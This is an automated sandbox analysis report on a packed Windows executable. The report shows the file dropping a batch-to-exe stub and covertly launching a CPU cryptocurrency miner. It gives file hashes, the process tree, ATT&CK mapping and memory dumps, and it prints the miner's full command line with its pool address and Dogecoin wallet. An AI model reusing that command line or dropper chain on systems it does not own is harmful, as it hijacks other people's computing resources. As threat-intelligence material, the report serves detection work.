73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
293s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
18/02/2024, 14:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1356	b2e.exe
2000	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe
2000	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5068-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 1356	5068	batexe.exe	74
PID 5068 wrote to memory of 1356	5068	batexe.exe	74
PID 5068 wrote to memory of 1356	5068	batexe.exe	74
PID 1356 wrote to memory of 424	1356	b2e.exe	75
PID 1356 wrote to memory of 424	1356	b2e.exe	75
PID 1356 wrote to memory of 424	1356	b2e.exe	75
PID 424 wrote to memory of 2000	424	cmd.exe	78
PID 424 wrote to memory of 2000	424	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5068
- C:\Users\Admin\AppData\Local\Temp\D3BB.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D3BB.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D3BB.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D6B9.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\D3BB.tmp\b2e.exe

Filesize
2.8MB

MD5
5553df37b1df7eca6639fb778ccc07f8

SHA1
ec7c55ab437e7a8dc54c10f97d7db8c5cc2561d7

SHA256
35391b24587589dde69406ef44d1a49c0409da77927093b7e9fffb9f6d14d4a3

SHA512
f3fbff8a35044618fb970cd4f4e22235e3c0e915e02da9540126f1452bbb8580a6b9f184d015fe41c2b9fcfac9af9da61005efacefa020c8beda07cfb48b77e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3BB.tmp\b2e.exe

Filesize
3.5MB

MD5
a9745f22d23ac666ebb2afdd8bdbe49f

SHA1
b321d0a447faa9b2077dd634ed299de5a85b6d38

SHA256
4a3a4479f3f7d9d48f4da6ae0c2c043c1cd55c7f9bec5f548f13fb0ca381eab1

SHA512
26865245ad058294005c74f351cd84857615ea4f0aad0ac03c64abc3a04ecdc4725feece8b90603fdf6ced856623a1eb68a80bcb4887d8acea74e62e7450a56f

Download Submit
C:\Users\Admin\AppData\Local\Temp\D6B9.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
700KB

MD5
2ed82450df91f05c5997c390514f66ef

SHA1
714e2705915edf9cb65e88c9a73553ebd6f734c7

SHA256
e529f5dfae0fe0c19f9b8cbf6b13851ec059bc465e128e5e26e5fcb5df933d05

SHA512
51940bcf6066c069fc6cf65bb462dfc08e9b7a7b1782e66331aa59caa779a8a3e6ecad3c0b88696f3ed1920425a8ca9dd0708fb7e1e2490240a9766abe5b09aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
584KB

MD5
50b99a368c119b065a861a6510ed60db

SHA1
7c37d8fa1a750a2d1382dd2d1aa1a17096cdbb77

SHA256
a3f4361fc41af42bd0e79b37651ac16521a393ac4be18e569a0cd1a6e0332e60

SHA512
b9498d71cf2610718730207e925841802664caa946a16ca7d7f637dd49e05b72e09320086854c4f9e5a4f6b9a99e78fb1a225a32eaa47fed4730ad4e704c76b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
612KB

MD5
180a5f8ee76f8740299090f76f223b7c

SHA1
656eb5e23b755ac97956cf25e09f1517259e3cb2

SHA256
b8577be4b4a2020c18888010c375fef2575304ff79ecc131d8e3a04380949601

SHA512
7fc40f2907345812df5da66acaa594de926908970b0f988f4b9eac72951c6241bd91332750127b15111c3783ff9ce0152fa00a8fd5992386278b2a9251ffea91

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
500KB

MD5
4da3f4e588913a13366ecb1d30dd5e7a

SHA1
82745c42d5bc897a78143973e957f75e54dd864d

SHA256
dd40b14fde7356ba184930c08eae28f06065a38d5da1a00eb3b01cb9d60a5738

SHA512
ced9ec2064d9ca4fe10ca04f4eed2eb9b750d266bce68cffb59a6b6523b496fc1d60eccccb7b2425b3a45c6b600879f0e3dd47d82f608d5aa2aa8d0f115793ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
489KB

MD5
d6ab9482dbf64540e3641d424b0bc8da

SHA1
be68bd80c21cf7067839afb17517327d5a7bd250

SHA256
879cd5dd8ede442f74b5aaba0f7a2e10cf86324cd6e4480718382a1664c13bfa

SHA512
2e6844a6f80d5f89ad8348e51f4a959a561fd13bc0f4fc6e74c29975bdb3e03f308605a09cadb1a400f49daf2e1c6c342732040e8659612304d05c1740dfde36

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
568KB

MD5
8cc1da1213baaca20241e32dc575386d

SHA1
6cf80189f4ec8f7685e5722289b3a4fa804d9d60

SHA256
9f8beb4c75861b035e5c9acb3036ea386ae192a6c2653f8aedaf04f67065638f

SHA512
592fcb1b8eef8f5bfe163c436a5c5d93e08b1bc42f602e35c69c21dd46ac46ddc7a712a6da5e691c6db54da87b604fdde1cb5eaab7f890057dafbf6b6fb8cc54

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
541KB

MD5
cdaf431d428426460b7bd969a049c726

SHA1
d7cb73f96117c00b19e5cd6df3c5ce49a7a8971f

SHA256
d6d3249e5fc3fcbb7c10ad559fb9e03597b654b01d4be431b5daa82e0d999c0f

SHA512
3a7aa06b3de0d493d7aebaa97f56980abcf7382504e6ce61abdcf9e49827c8c33abeba0cf594e3f678eda9ac1d25457eb9b59d0c80089463752a892eea6afab6

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
639KB

MD5
ab1b4619e33717d279cf7d6430f0863a

SHA1
201f60f42296cc45c7370d9acb91d29a6513bbc3

SHA256
2a2c348bb7b0638bdf063a62e9cfbdfab080a50280a18df664e2cade5dff348e

SHA512
fc9aa4b85341a4322987aa4f08f0d10f6b634ddfaa2daa9e45fa86fe9d845567378cfae58779e1aff652ce64b0ff5a4c0874a47ab5511632fa99bfb86b447e75

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.1MB

MD5
34de3bbcffae37d7d93eca28a29d9d87

SHA1
0497d3537deca09b455f1c9ff21c6c4f5bd5c4a1

SHA256
f19997d28035f7b5d2c9dfbb0bcc8c356603d800fb53dabcf22a892f511f07d5

SHA512
f18f39a96b0b9d1a183df6fc3047cd1d00823303646dc12a2ca1a0d273e0dd5dc02fc94c3b08430067e9749ed524e76e908f233a49bb8dee4bf04bd368bdda8e

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
348KB

MD5
e7eacb5e72521e96015fa070a53439c9

SHA1
880d7301bd0884588209a7731ec79df8d671710e

SHA256
a79954f926adfaa54bd41248c96e19fd6ad050bdc8b898a68991ec9bb2f89ff3

SHA512
16d63612e361aa4151fa9f5e1cb93c3d514054d92fd99f12ad67dee0a9d6888365123dc32e6d060401ca0bf1485c8a903330086e3f06bae02be95850f64fe9e1

Download Submit
memory/1356-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1356-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2000-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2000-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2000-44-0x00000000010C0000-0x0000000002975000-memory.dmp

Filesize
24.7MB

Download
memory/2000-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-42-0x0000000069FA0000-0x000000006A038000-memory.dmp

Filesize
608KB

Download
memory/2000-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2000-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5068-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download